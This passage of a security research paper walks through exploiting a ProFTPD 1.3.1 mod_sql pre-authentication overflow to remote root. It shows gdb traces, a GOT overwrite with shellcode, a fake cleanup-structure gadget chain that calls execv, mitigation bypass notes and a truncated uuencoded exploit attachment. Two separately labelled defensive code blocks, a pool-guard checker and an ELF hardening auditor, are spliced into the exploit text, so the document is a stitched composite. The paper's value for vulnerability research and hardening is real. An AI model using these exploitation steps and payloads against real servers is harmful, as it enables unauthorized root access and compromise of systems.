0x80e9213 <[...]_file+3027>: 0x256d2554 0x255a256d 0x256d2554 0x416c255a
0x80e9223 <[...]_file+3043>: 0x6c255425 0x54256c25 0x5a256625 0x66256d25
0x80e9233 <[...]_file+3059>: 0x54256625 0x5a256625 0x6d256c25 0x25415425
0x80e9243 <[...]_file+3075>: 0x3061416d 0x41316141 0x61413261 0x0e821833

Playing around further, we see that strlen() is called before that, so 
further experimentation reveals we want to overwrite:

080e819c R_386_JUMP_SLOT   strlen

(Code for this can be found in [9])

And our offset is 0x080e819c-358..

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7c7a6b0 (LWP 13357)]
0x41306141 in ?? ()

So, we've made it jump to another pattern in msf.. which we can replace 
with a pointer to our shellcode.. which will be:

(gdb) x/s 0x080e819c
0x80e819c <_GLOBAL_OFFSET_TABLE_+424>:
"Aa0Aa1Aa2Aa36\200\016\b{UNKNOWN TAG}", 'A' <repeats 74 times>,
"%T%f%TA%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%m%T%m
%m%Z%T%m%Z%lA%T%l%l%T%f"...
(gdb) x/s 0x080e819c+29
0x80e81b9 <_GLOBAL_OFFSET_TABLE_+453>:   'A' <repeats 74 times>,
"%T%f%TA%Z%m%Z%mA%m%ZA%Z%l%mA%T%mA%T%m%f%ZA%m%f%m%Z%m%T%m%T%m%f%fA%ZA%m%T%m
%m%Z%T%m%Z%lA%T%l%l%T%f%Z%m%f%f%T%f%Z%l%m%TA%mAa0Aa1"...

To hit our A's.

We can now use a suitable stager findsock/execve shell... We'll use the one
we found earlier with metasploit. Verifying that we can hit our shellcode, 
we see:

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to Thread 0xb7c7a6b0 (LWP 13476)]
0x080e81ba in _GLOBAL_OFFSET_TABLE_ ()

So, now we get to validate the shellcode works as expected (code can be 
found in [10])

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7b666b0 (LWP 13648)]
0xbf86cad0 in ?? ()
(gdb) x/10i $eip
0xbf86cad0:     mov    %edi,%ebx
0xbf86cad2:     push   $0x2
0xbf86cad4:     pop    %ecx
0xbf86cad5:     push   $0x3f
0xbf86cad7:     pop    %eax
0xbf86cad8:     int    $0x80
0xbf86cada:     dec    %ecx
0xbf86cadb:     jns    0xbf86cad5
0xbf86cadd:     push   $0xb
0xbf86cadf:     pop    %eax

Whoops. Not so much. The stager code works by reading from the socket to 
the stack, and jumping to the stack once complete. It seems that the kernel
I'm using doesn't make the stack executable even if you setarch/personality
it. 

We could work around that shortcoming in metasploit by changing our
shellcode to read() into a different buffer, or mmap() some suitable
memory, or one of a hundred things. For now though, I'll cheat and install
the generic kernel, and try to finish off this paper :)

Installing the ubuntu -generic kernel, we see (in gdb):

---
[New process 4936]
Executing new program: /bin/dash
(no debugging symbols found)
warning: Cannot initialize thread debugging library: generic error
warning: Cannot initialize thread debugging library: generic error
(no debugging symbols found)
[New process 4936]
(no debugging symbols found)
---
# python exploitsc.py 127.0.0.1
Banner is [220 ProFTPD 1.3.1 Server (ProFTPD Default Installation) 
[127.0.0.1]]
331 Password required for %T%m%Z%m%T%l%m%f%l%m%lA%T%m%f%f%l%m%m%T%m%f%m%m%m
%mA%m%f%f%l%m%TA%m%m%f%l%TA%fA%l%Z%fA%T%T%l%f%l%f%f%Z%l%m%Z%f%l%T%f%Z%fAAA%
Z%l%m%fA%l%m%TA%ZA%f%lAA%f%m%Z%Z%Z%T%Z%f%m%Z%l%fA%Z
530 Login incorrect.
*** With luck, you should have a shell ***

id
uid=0(root) gid=65534(nogroup) groups=65534(nogroup)
uname -a
Linux ubuntu 2.6.27-14-generic #1 SMP Tue Aug 18 16:25:45 UTC 2009 i686 
GNU/Linux
---

Well, that demonstrates from source code to shellcode execution..
exploitation via the demonstrated avenue isn't ideal, but still pretty
decent.

------[ 4.1 - Cleanup structure crash ]

While experimenting with the auth bypass idea with one of the
3d10e2a054d8124ab4de5b588c592830 crashes, I hit a pool cleanup structure,
and decided to experiment further (with an overwrite of 44 bytes), and
exploit it without any shellcode required.

For this section, we'll target Fedora 10, and the following packages:

fbf3dccc1a396cda2d8725b4503bfc16 proftpd-1.3.1-6.fc10.i386.rpm
938fd1a965d72ef44cd4106c750a0a2d proftpd-mysql-1.3.1-6.fc10.i386.rpm

Firstly, we'll quickly review some of the protection measures 
enabled/available in Fedora 10. 

- Exec-shield
  - Aims to prevent code execution via Code Selector limits, or via PAE.
  - CS limits are not ideal. 

- FORTIFY_SOURCE
  - Instruments code during compiling and aims to prevent overflows via
    common library functions. 

- PIE binaries
  - Some binaries available in Fedora 10 are compiled as a position
    independent executable (PIE).
  - Numerous binaries are compiled as ET_EXEC's, however, including
    ProFTPD.

- SELinux
  - SELinux is a kernel feature that allows mandatory access control in the
    kernel. For what we're concerned about, it's aimed at restricting what 
    can happen post exploitation. A frequent criticism of SELinux is that 
    it does not protect the kernel against attack.

So, looking at the crash:

Program received signal SIGSEGV, Segmentation fault.
destroy_pool (p=0x8731eac) at pool.c:415
415         if (p->parent->sub_pools == p)
(gdb) p *p
$1 = {first = 0x61413561, last = 0x37614136, cleanups = 0x41386141,
sub_pools = 0x62413961, sub_next = 0x31624130, sub_prev = 0x0,
  parent = 0x62413362, free_first_avail = 0x8002927 <Address 0x8002927
out of bounds>, tag = 0x0}

Quick glance at the source code (from the proftpd-1.3.2-rc2 release, not
the fedora release):

---
410 void destroy_pool(pool *p) {
411   if (p == NULL)
412     return;
413
414   pr_alarms_block();
415
416   if (p->parent) {
417     if (p->parent->sub_pools == p)
418       p->parent->sub_pools = p->sub_next;
419
420     if (p->sub_prev)
421       p->sub_prev->sub_next = p->sub_next;
422
423     if (p->sub_next)
424       p->sub_next->sub_prev = p->sub_prev;
425   }
426   clear_pool(p);
427   free_blocks(p->first, p->tag);
428
429   pr_alarms_unblock();
430 }
---

So, we can see that we overwrote p->parent, and thus entered the 
conditional on line 416. In order to effectively bypass that section, we
need:

- p->parent to point to accessible memory (doesn't matter where, it's
  unlikely to point to p)

- p->sub_prev got nulled out earlier, so it doesn't matter.

- p->sub_next to point to writable memory.

- p->cleanups to point to some memory to be the cleanup structure.

The cleanup structure looks like:

---
typedef struct cleanup {
  void *data;
  void (*plain_cleanup_cb)(void *);
  void (*child_cleanup_cb)(void *);
  struct cleanup *next;
} cleanup_t;
---

---
static void run_cleanups(cleanup_t *c) {
  while (c) {
    (*c->plain_cleanup_cb)(c->data);
    c = c->next;
  }
}
---

The benefit of run_cleanups is that we could call a bunch of different
pointers as needed.
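
Seen from the allocator's side, both the unlink in destroy_pool() and the
callback loop in run_cleanups() trust a header that may have been
overwritten. The following added example (not ProFTPD's code; guarded_pool,
pool_secret and pool_destroy_checked are hypothetical names and the layout
is simplified) verifies an address-keyed guard word and the list
back-pointers before touching either.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simplified stand-ins for ProFTPD's cleanup_t and pool (illustrative layout). */
typedef struct cleanup {
  void *data;
  void (*plain_cleanup_cb)(void *);
  struct cleanup *next;
} cleanup_t;

typedef struct guarded_pool {
  uintptr_t guard;  /* first field, so a linear header overwrite reaches it */
  cleanup_t *cleanups;
  struct guarded_pool *sub_pools, *sub_next, *sub_prev, *parent;
} guarded_pool;

enum { POOL_OK = 0, POOL_BAD_GUARD = 1, POOL_BAD_LINKS = 2 };
/* Constructed constant; a real allocator would take it from the OS RNG once. */
static uintptr_t pool_secret = (uintptr_t)0x5bd1e995UL;
static int cleanups_run = 0;

static uintptr_t guard_for(const guarded_pool *p) {
  return pool_secret ^ (uintptr_t)p;  /* keyed to the header's own address */
}

static void pool_init(guarded_pool *p, guarded_pool *parent) {
  memset(p, 0, sizeof(*p));
  p->guard = guard_for(p);
  if (parent) {                       /* head insertion, as in make_sub_pool() */
    p->parent = parent;
    p->sub_next = parent->sub_pools;
    if (p->sub_next) p->sub_next->sub_prev = p;
    parent->sub_pools = p;
  }
}

static void count_cleanup(void *data) { (void)data; cleanups_run++; }

/* Returns POOL_OK after a verified teardown; a server would abort() otherwise. */
static int pool_destroy_checked(guarded_pool *p) {
  if (p == NULL) return POOL_OK;
  /* 1. Nothing in *p is trusted until its guard verifies. */
  if (p->guard != guard_for(p)) return POOL_BAD_GUARD;
  /* 2. Neighbours must point back at p before any unlink write happens. */
  if (p->parent && p->parent->guard != guard_for(p->parent))
    return POOL_BAD_GUARD;
  if (p->sub_prev ? p->sub_prev->sub_next != p
                  : (p->parent && p->parent->sub_pools != p))
    return POOL_BAD_LINKS;
  if (p->sub_next && p->sub_next->sub_prev != p) return POOL_BAD_LINKS;
  /* 3. Unlink, then run callbacks (recursion into sub-pools is omitted). */
  if (p->parent && p->parent->sub_pools == p)
    p->parent->sub_pools = p->sub_next;
  if (p->sub_prev) p->sub_prev->sub_next = p->sub_next;
  if (p->sub_next) p->sub_next->sub_prev = p->sub_prev;
  for (cleanup_t *c = p->cleanups; c; c = c->next)
    c->plain_cleanup_cb(c->data);
  p->guard = 0;                       /* a second destroy now fails step 1 */
  return POOL_OK;
}

/* Clean teardown runs the cleanup once; destroying again is rejected. */
static int demo_clean_destroy(void) {
  guarded_pool parent, child;
  cleanup_t c = { NULL, count_cleanup, NULL };
  pool_init(&parent, NULL);
  pool_init(&child, &parent);
  child.cleanups = &c;
  cleanups_run = 0;
  return pool_destroy_checked(&child) == POOL_OK && cleanups_run == 1 &&
         parent.sub_pools == NULL &&
         pool_destroy_checked(&child) == POOL_BAD_GUARD;
}

/* Linear header overwrite (constructed 0x41 filler): rejected up front. */
static int demo_overwrite_detected(void) {
  guarded_pool parent, child;
  pool_init(&parent, NULL);
  pool_init(&child, &parent);
  memset(&child, 0x41, sizeof(child));
  cleanups_run = 0;
  return pool_destroy_checked(&child) == POOL_BAD_GUARD && cleanups_run == 0;
}

/* Guard intact but one link rewritten: caught by the back-pointer check. */
static int demo_link_tamper_detected(void) {
  guarded_pool parent, a, b;
  pool_init(&parent, NULL);
  pool_init(&a, &parent);
  pool_init(&b, &parent);             /* list is now parent -> b -> a */
  a.sub_prev = NULL;                  /* constructed corruption */
  return pool_destroy_checked(&a) == POOL_BAD_LINKS && parent.sub_pools == &b;
}

int main(void) {
  printf("clean=%d overwrite=%d links=%d\n", demo_clean_destroy(),
         demo_overwrite_detected(), demo_link_tamper_detected());
  return 0;
}
```

The guard only catches overwrites that run through the start of the header;
a write that lands on a single field past it is left to the back-pointer
checks.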

So, all we need now is to meet our earlier requirements.. For
reading/writing memory, the BSS is fine.

For the cleanup structure, we need something that is not randomized, and
that we know the offset for. Luckily for us, ProFTPD formats its response 
into the resp_buf buffer, which is on the BSS.

(gdb) p resp_buf
$5 = "Login incorrect.\000 for
%m%m%TA%ZA%f%l%fA%mAA%f%TA%f%f%l%l%m%lA%f%Z%m%m%TA%Z%ZA%T%Z%ZAAA%m%m%f%m%T%
m%f%fA%T%T%Z%l%T%m%l%f%f%f%Z%Z%l%TA%l%l%f%mAA%Z%TAA%f%m%ZAA%l%Z%Z%m%Z%lA%f%
m"...

And, it doesn't clear memory, leaving old data available for us to use as 
our structure location. Our first fake auth will have a bunch of 
AAAA / BBBB / CCCC we can use for replacing.

With those in mind, we can trigger the vulnerability, and see what's 
available to us:

Program received signal SIGSEGV, Segmentation fault.
0x0805c82d in run_cleanups (c=0x80ed933) at pool.c:730
730         (*c->plain_cleanup_cb)(c->data);
..
(gdb) x/10i $eip
0x805c82d <run_cleanups+16>:    call   *0x4(%ebx)
(gdb) x/4x $ebx
0x80ed933 <resp_buf+179>:       0x42424242      0x43434343
0x44444444      0x45454545

Hm, so we need a location in memory to jump to. We control the first
argument to the function, which is useful. Looking at the symbol
table, we see some stuff of interest:


080e44f4 R_386_JUMP_SLOT   __printf_chk
080e4574 R_386_JUMP_SLOT   mempcpy
080e4578 R_386_JUMP_SLOT   __memcpy_chk
080e4604 R_386_JUMP_SLOT   dlsym
080e46a4 R_386_JUMP_SLOT   execv
080e469c R_386_JUMP_SLOT   memcpy
080e48d4 R_386_JUMP_SLOT   mmap64
080e4800 R_386_JUMP_SLOT   strcat


dlsym() might be useful if we can get the results and save it somewhere.

memcpy()/strcat()/memcpy()/etc could be useful for constructing a ret to
libc style attack.

printf() could be used to leak memory contents. Can't use it for writing
to memory due to FORTIFY_SOURCE.

mmap64() could be useful to map memory readable, writable and executable 
(assuming SELinux allows it, which is unlikely in recent releases).

execv() could be used to execute an arbitrary process (assuming not
prevented by SELinux). execv() takes two parameters, program to execute, 
and argument list. The argument list must consist of valid pointers to 
readable memory, or the execve() (syscall) will fail.

Since execv() looks like least effort, we'll need to find a way to modify 
the stack so that the next argument is a pointer to something suitable (a 
pointer to NULL would be sufficient)

(gdb) x/4x $esp
0xbf977c60:     0x42424242      0x080ccbe2      0x080e8a40
0x08730578
(gdb) x/s 0x080ccbe2
0x80ccbe2:       "getgroups"

Taking stock of what we have:

eax            0x42424242       1111638594
ecx            0x8734e10        141774352
edx            0x80eb040        135180352
ebx            0x80ed933        135190835
esp            0xbf977c60       0xbf977c60
ebp            0xbf977c78       0xbf977c78
esi            0x8731eac        141762220
edi            0x80f680c        135227404

We control eax, edx (edx is the fake pointer for sub_prev/sub_next
stuff), we control ebx to an extent:

(gdb) x/7x $ebx
0x80ed933 <resp_buf+179>: 0x42424242 0x43434343 0x44444444 0x45454545
0x80ed943 <resp_buf+195>: 0x46464646 0x47474747 0x48484848

We control esi to an extent:
(gdb) x/s $esi
0x8731eac:       "a5Aa6Aa73\331016\ba9Ab@\260\016\b"

So, with that in mind, we are looking for writes to stack at [esp], 
[esp+4], [esp+8] and [esp+0xc], and hopefully then a jump register. 

We can assemble a bunch of instructions, and use msfelfscan to show 
potential hits:

ruby msfelfscan -r
"\x89[\x44\x54]\x24[\x04\x08\x0c][^\xff\xe8]*\xff[\x53\x10\x50\xd0-\xe0]"
/usr/sbin/proftpd
[/usr/sbin/proftpd]

After spending some time looking at the output, we find one that fits the 
bill, and is absolutely perfect.

(gdb) x/10i 0x08063ed8
0x8063ed8 <run_schedule+56>:    mov    %eax,0xc(%esp)
0x8063edc <run_schedule+60>:    mov    0x1c(%ebx),%eax
0x8063edf <run_schedule+63>:    mov    %eax,0x8(%esp)
0x8063ee3 <run_schedule+67>:    mov    0x18(%ebx),%eax
0x8063ee6 <run_schedule+70>:    mov    %eax,0x4(%esp)
0x8063eea <run_schedule+74>:    mov    0x14(%ebx),%eax
0x8063eed <run_schedule+77>:    mov    %eax,(%esp)
0x8063ef0 <run_schedule+80>:    call   *0xc(%ebx)

If we execute from 0x8063ee3, it does the job perfectly. It will load 
pointers from $ebx (which we can populate however we want), and stick them 
on the stack, then jump to an address we want. We will need a program to 
execute, and a pointer to NULL. We can craft the fakeauth attempt as:

...memory stuff...AAAABBBBCCCC.../bin/sh or /usr/bin/python (as it's
important to have NULL termination, which will be provided).

Hardware assisted breakpoint 1 at 0x8063ee3: file support.c, line 132.

Breakpoint 1, 0x08063ee3 in run_schedule () at support.c:132
132           s->f(s->a1,s->a2,s->a3,s->a4);
Missing separate debuginfos, use: debuginfo-install
audit-libs-1.7.13-1.fc10.i386 e2fsprogs-libs-1.41.4-6.fc10.i386
keyutils-libs-1.2-3.fc9.i386 krb5-libs-1.6.3-18.fc10.i386
libattr-2.4.43-2.fc10.i386 libselinux-2.0.78-1.fc10.i386
mysql-libs-5.0.84-1.fc10.i386 zlib-1.2.3-18.fc9.i386
(gdb) x/8i $eip
0x8063ee3 <run_schedule+67>:    mov    0x18(%ebx),%eax
0x8063ee6 <run_schedule+70>:    mov    %eax,0x4(%esp)
0x8063eea <run_schedule+74>:    mov    0x14(%ebx),%eax
0x8063eed <run_schedule+77>:    mov    %eax,(%esp)
0x8063ef0 <run_schedule+80>:    call   *0xc(%ebx)
(gdb) x/x $ebx+0x18
0x80ed94b <resp_buf+203>:       0x48484848
(gdb) x/x $ebx+0x14
0x80ed947 <resp_buf+199>:       0x47474747
(gdb) x/x $ebx+0xc
0x80ed93f <resp_buf+191>:       0x45454545

We can replace HHHH with resp_buf + 400 to point to NULL, we can put in our
offset for the program to execute in GGGG, and our execv code at EEEE, 
which will be:

080526b8 <execv@plt>:
 80526b8:       ff 25 a4 46 0e 08       jmp    *0x80e46a4
 80526be:       68 00 05 00 00          push   $0x500
 80526c3:       e9 e0 f5 ff ff          jmp    8051ca8 <_init+0x30>

Putting those together, we then see:

Breakpoint 1, 0x08063ee3 in run_schedule () at support.c:132
132           s->f(s->a1,s->a2,s->a3,s->a4);
(gdb) c
Continuing.
[New process 22952]
Executing new program: /bin/bash
warning: Cannot initialize thread debugging library: generic error

Due to alarm() being called in ProFTPD, you'll have to reset it / catch it 
/ block it (the "trap" command in bash should be able to do this for you), 
otherwise the connection will drop out some time later on.

If PIE was enabled, and the binary ended up past 0x01000000, we could brute
force it and still gain code execution. The only problem now to deal with 
is with SELinux restrictions. Any decent kernel exploit will disable that 
for you ;)

------[ 4.2 - Potential enhancements ]

There are a variety of enhancements that could be done to make the exploit 
better in a variety of ways, such as known target lists, bruteforce 
ability (both offset and tags, if necessary. Timing attacks may be useful),
porting it to metasploit so you have the advantage of changing shellcodes,
etc.

Also, more work would be required against distributions, because if ProFTPD
is compiled with shared library support, using time() as an offset may 
change ;) Additionally, it may be possible that some distributions require 
different approaches due to character restrictions.

Further research would be needed into common ProFTPD w/ mod_sql.c 
configuration guides in order to see what table names / fields are used.

Further experimentation with the pool implementation in ProFTPD might be in
order, as perhaps it would be possible to work out a generic fake/trigger
string that would work in all cases. 

Since the SQL injection fix, the bug is no longer remote root pre auth via 
USER handling, so it has lost a lot of its sexiness <;-P~ Don't know if the 
bug is reachable through authentication.. if it is, there's a lot more work
involved due to dropped privileges, potential chroot()ing, and so on. At 
least RootRevoke isn't enabled by default according to some random 
documentation I was reading :p

------[ 4.3 - Last thoughts ]

Initial experimentation of the vulnerability with constraint solvers was
interesting, however, in hindsight, just replicating the constraint checks
and random generation would have been a better idea. Same goes for using GA
to mutate input strings, though the GA use was worse because the metrics
used were pretty bad. In hindsight, I had a solution looking for a problem.

Additionally, [11] has some more information regarding this vulnerability
when you consider the timing aspect of heap massages.

--[ 5 - Discussion of hardening techniques against exploitation ]

It's always fun to consider the effects of various hardening techniques
against exploitation, and whether they help mitigate the issue. Here are 
some thoughts on the matter.

------[ 5.1 - Address Space Layout Randomisation ]

If the binary is not compiled as a position independent executable (PIE)
binary, ASLR is not much of a problem as we target the GOT for storing the
shellcode. We require only one offset, and on non-PIE binaries, we should 
be in luck.

------[ 5.2 - Non-executable Memory ] 

Kernels using PAE and the hardware supported NX-bit will break our 
shellcode approach, however, they will not affect the approach used in 
"Cleanup structure crash".

With kernels that use CS limit to approximate non executable memory, it may
be possible that a higher region of memory is marked executable, and thus 
our shellcode region is executable. The metasploit stager shellcode reads
onto the stack and jumps to it, so CS limit approximation would block that
attempt. A suitable mprotect() call could fix it though.

It may be possible to use the overflow to make ProFTPD think we have been 
authenticated, without requiring any shellcode. Assuming the pool memory 
layout is not irreparably harmed, we may be able to do some interesting 
things.

------[ 5.3 - Position Independent Executable Binaries ]

In case of PIE, it would be feasible to brute force the randomisation as
ProFTPD fork()s for each client connection. In order to make the most of
ASLR, ProFTPD would have to fork+execve() itself, or be configured to use
xinetd/inetd (which would probably be a significant performance problem on 
busy sites). Using fork+execve() would be the best approach as it would 
require least changes by the user except an update to ProFTPD.

The avenue we are using for exploitation does not lend itself to off-by-X 
overwrites, as ')\x00 is appended to our contents, which restricts the 
characters we can use dramatically. 

As for information leaks, I have seen heap address info leaks when the 
server replies with "Password needed for <OUR CONTENT><MANGLED HEAP 
ADDRESS>". This may be useful at some stage if a different avenue is needed
for exploitation.

Unfortunately, ProFTPD frequently uses pcalloc() which reduces the 
potential for info leaks in some other cases.

------[ 5.4 - Stack Protector ] 

SSP does not play much of a part as we are not overwriting the stack, nor 
are we abusing a libc function to overwrite contents (due to recent 
instrumentation added to gcc/glibc/so on). So far, targeting the stack 
seems irrelevant, and due to ASLR being in modern kernels, not that useful.

------[ 5.5 - RelRO ]

If read-only relocations are enabled on the target binary (and being 
enforced/enabled properly), they will break our current avenue of 
overwriting the GOT table to gain control of execution. 

However, it may be possible to target .bss heap pointers in ProFTPD that 
get called. (objdump -tr /usr/local/sbin/proftpd | grep bss | grep 0004 or 
so should find potential function pointers :p)

Assuming non-executable memory is not in use, the BSS provides a suitable
location to store our shellcode, due to the proctitle.c code.
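
For anyone auditing their own build against sections 5.1, 5.2 and 5.5, the
check below reads the PIE, NX (PT_GNU_STACK) and RELRO state straight from 
the ELF headers. It is an added example, not part of the original article 
or its attached code; audit_elf(), findings() and build_sample() are names 
made up here, and the sample images are constructed test data.

```python
import struct
import sys

# Constants from the ELF gABI and its GNU extensions.
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X = 0x1
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def audit_elf(data):
    """Return the PIE / NX / RELRO status of the ELF image in `data`."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2                      # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    end = "<" if data[5] == 1 else ">"       # EI_DATA: 1 = little endian
    if is64:
        ehdr_fmt, phdr_fmt, dyn_fmt = "HHIQQQIHHHHHH", "IIQQQQQQ", "qQ"
    else:
        ehdr_fmt, phdr_fmt, dyn_fmt = "HHIIIIIHHHHHH", "IIIIIIII", "iI"
    ehdr = struct.unpack_from(end + ehdr_fmt, data, 16)
    e_type, e_phoff, e_phentsize, e_phnum = ehdr[0], ehdr[4], ehdr[8], ehdr[9]

    stack_flags, has_relro, dyn = None, False, None
    for i in range(e_phnum):
        ph = struct.unpack_from(end + phdr_fmt, data, e_phoff + i * e_phentsize)
        if is64:   # 64-bit program headers carry p_flags second
            p_type, p_flags, p_offset, p_filesz = ph[0], ph[1], ph[2], ph[5]
        else:
            p_type, p_offset, p_filesz, p_flags = ph[0], ph[1], ph[4], ph[6]
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            dyn = (p_offset, p_filesz)

    # Full RELRO needs eager binding, otherwise .got.plt must stay writable.
    bind_now = False
    if dyn:
        size = struct.calcsize(end + dyn_fmt)
        for off in range(dyn[0], dyn[0] + dyn[1] - size + 1, size):
            tag, val = struct.unpack_from(end + dyn_fmt, data, off)
            if tag == DT_NULL:
                break
            if (tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW)
                    or (tag == DT_FLAGS_1 and val & DF_1_NOW)):
                bind_now = True

    relro = "full" if has_relro and bind_now else "partial" if has_relro else "none"
    return {
        # Shared libraries are ET_DYN too; for an executable it means PIE.
        "pie": e_type == ET_DYN,
        # A missing PT_GNU_STACK is treated as an executable stack.
        "nx": stack_flags is not None and not stack_flags & PF_X,
        "relro": relro,
    }


def findings(report):
    """List the weaknesses that section 5 ties to each missing mitigation."""
    out = []
    if not report["pie"]:
        out.append("no PIE: GOT/.bss addresses are fixed despite ASLR (5.1)")
    if not report["nx"]:
        out.append("no NX stack marking: injected bytes may be executable (5.2)")
    if report["relro"] != "full":
        out.append("RELRO %s: PLT GOT entries stay writable (5.5)" % report["relro"])
    return out


def build_sample(e_type, stack_flags, relro, bind_now):
    """Construct a minimal 32-bit LE ELF image (test data, not a real binary)."""
    dyn = struct.pack("<iI", DT_FLAGS, DF_BIND_NOW) if bind_now else b""
    dyn += struct.pack("<iI", DT_NULL, 0)
    segs = [(PT_DYNAMIC, 6)]                 # (p_type, p_flags)
    if stack_flags is not None:
        segs.append((PT_GNU_STACK, stack_flags))
    if relro:
        segs.append((PT_GNU_RELRO, 4))
    dyn_off = 52 + 32 * len(segs)            # Elf32_Ehdr + program headers
    image = b"\x7fELF\x01\x01\x01" + b"\x00" * 9 + struct.pack(
        "<HHIIIIIHHHHHH", e_type, 3, 1, 0, 52, 0, 0, 52, 32, len(segs), 0, 0, 0)
    for p_type, p_flags in segs:
        off, size = (dyn_off, len(dyn)) if p_type == PT_DYNAMIC else (0, 0)
        image += struct.pack("<IIIIIIII", p_type, off, 0, 0, size, size, p_flags, 4)
    return image + dyn


if __name__ == "__main__":
    if len(sys.argv) > 1:                    # audit a real binary by path
        with open(sys.argv[1], "rb") as fh:
            image = fh.read()
    else:                                    # constructed legacy-style build
        image = build_sample(ET_EXEC, 7, False, False)
    report = audit_elf(image)
    print(report)
    for line in findings(report):
        print(" -", line)
```

Run it with the path to the installed proftpd binary as its only argument; 
an empty findings list means PIE, NX and full RELRO are all in place.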

--[ 6 - References ]

[1]  http://www.proftpd.org
[2]  http://labix.org/python-constraint
[3]  http://bitbucket.org/haypo/python-ptrace/
[4]  http://pyevolve.sourceforge.net/
[5]  http://www.castaglia.org/proftpd/doc/devel-guide/introduction.html
[6]  http://www.phreedom.org/solar/exploits/proftpd-ascii/
[7]  ga_exp_find.py in the attached code.. my bash history says I used
     it with python ga_exp_find.py -o 32 -i 127.0.0.1 -U -s f .. for 
     what it's worth :p
[8]  http://dev.mysql.com/doc/refman/5.0/en/string-syntax.html
[9]  code/final_exploit/exploit.py
[10] code/final_exploit/exploitsc.py
[11] http://felinemenace.org/~andrewg/Timing_attacks_and_heap_exploitation/


M8F1A('@Z("AS970H<W1R=6-T+G!A8VLH(CQ,(BP@>"DI("8@<V5L9BYB861C
M:&%R<RD@/3T@<V5T*"DL(&%D9')E<W-E<RD*"0D)(V%D9')E<W-E<R`](&9I
M;'1E<BAL86UB9&$@>#H@*'-E="AS=')U8W0N<&%C:R@B/$PB+"!X*S8T*2D@
M)B!S96QF+F)A9&-H87)S*2`]/2!S970H*2P@861D<F5S<V5S*0H)"0D*"@D)
M"7!R:6YT(")';W0@)60@=&%R9V5T<R(@)2!L96XH861D<F5S<V5S*0H)"0EF
M;W(@861D<F5S<R!I;B!A9&1R97-S97,Z"@D)"0EP<FEN="`B5')Y:6YG(#!X
M)3`X>"(@)2!A9&1R97-S"@H)"0D);6]D(#T@;&5N*")087-S=V]R9"!R97%U
M:7)E9"!F;W(@(BD*"0D)"69A:V5?<W1R:6YG("`]('-T<BAF86ME875T:"D*
M"0D)"6UO9"`K/2!L96XH9F%K95]S=')I;F<I"@D)"0EM;V0@)3T@-`H*"0D)
M"7!C(#T@4&]O;$-L96%N=7`H"@D)"0D)861D<F5S<RMM;V0K."P*"0D)"0EA
M9&1R97-S*VUO9"LX+`H)"0D)"6%D9')E<W,K;6]D*S@L"@D)"0D)861D<F5S
M<RMM;V0K*S@X"@D)"0DI"@H)"0D)9F%K95]S=')I;F<@*ST@<W1R*'!C*2`J
M(#(@"@D)"0EF86ME7W-T<FEN9R`K/2!S96QF+G-H96QL8V]D90H*"0D)"7!B
M(#T@4&]O;$)L;VLH861D<F5S<RLQ,#`L(&%D9')E<W,@*R`S,#`L(&%D9')E
M<W,@*R`R,#`L(#!X-#$T,C0S-#0I"@D)"0EP:"`](%!O;VQ(96%D97(H"@D)
M"0D)861D<F5S<RLP>#(P,"P*"0D)"0EA9&1R97-S*S!X,S`P+`H)"0D)"6%D
M9')E<W,K;6]D+3(T+"`C(&]U<B!C;&5A;G5P"@D)"0D)861D<F5S<RLP>#0P
M,"P*"0D)"0EA9&1R97-S*S!X-3`P+`H)"0D)"6%D9')E<W,K,'@V,#`L"@D)
M"0D)861D<F5S<RLP>#<P,"P*"0D)"0EA9&1R97-S*S!X-S`P+"`C(&)L86@N
M"@D)"0DI"@H)"0D)=')I9V=E<E]S=')I;F<@(#T@<W1R*'1R:6=G97)A=71H
M*0H)"0D)=')I9V=E<E]S=')I;F<@*ST@<W1R*'!B*0H)"0D)=')I9V=E<E]S
M=')I;F<@*ST@<W1R*'!H*0H*"0D)"2-P<FEN="`B;&5N*&8I.B(L(&QE;BAF
M86ME7W-T<FEN9RD*"0D)"2-P<FEN="`B9FPZ(BP@9FP*"0D)"2-P<FEN="`B
M;&5N*'0I.B(L(&QE;BAT<FEG9V5R7W-T<FEN9RD*"0D)"2-P<FEN="`B=&PZ
M(BP@=&P*"0D)"6%S<V5R="AL96XH9F%K95]S=')I;F<I(#T](&9L*0H)"0D)
M87-S97)T*&QE;BAT<FEG9V5R7W-T<FEN9RD@/3T@=&PI"@H)"0D)<V5L9BYC
M;VYN96-T*"D*"0D)"7-E;&8N9&]?9F%K95]A=71H*&9A:V5?<W1R:6YG*0H*
M"0D)"2-X(#T@<F%W7VEN<'5T*")H:70@96YT97(@=&\@=')I9V=E<B!V=6QN
M/B`B*0H*"0D)"7-E;&8N<VMT+G-E;F0H(E5315(@)7-<<EQN(B`E('1R:6=G
M97)?<W1R:6YG*0H*"0D)"7)L:7-T+"!W;&ES="P@>&QI<W0@/2!S96QE8W0N
M<V5L96-T*%MS96QF+G-K=%TL(%M=+"!;<V5L9BYS:W1=+"`U+C`I"@D)"0EI
M9BAR;&ES="`]/2!;72!A;F0@>&QI<W0@/3T@6UTI.@H)"0D)"7!R:6YT(")&
M;W5N9"!`(#!X)3`X>"(@)2!A9&1R97-S"@D)"0D)(R!"3$%(+B!N965D('1O
M(&%V;VED('1H:7,@9'5E('1O('-S;`H)"0D)"7-E;&8N<VMT+G-E;F0H<V5L
M9BYS:&5L;&-O9&4R*0H)"0D)"7-E;&8N<VAE;&Q?:&%N9&QE<B@I"@D)"0D)
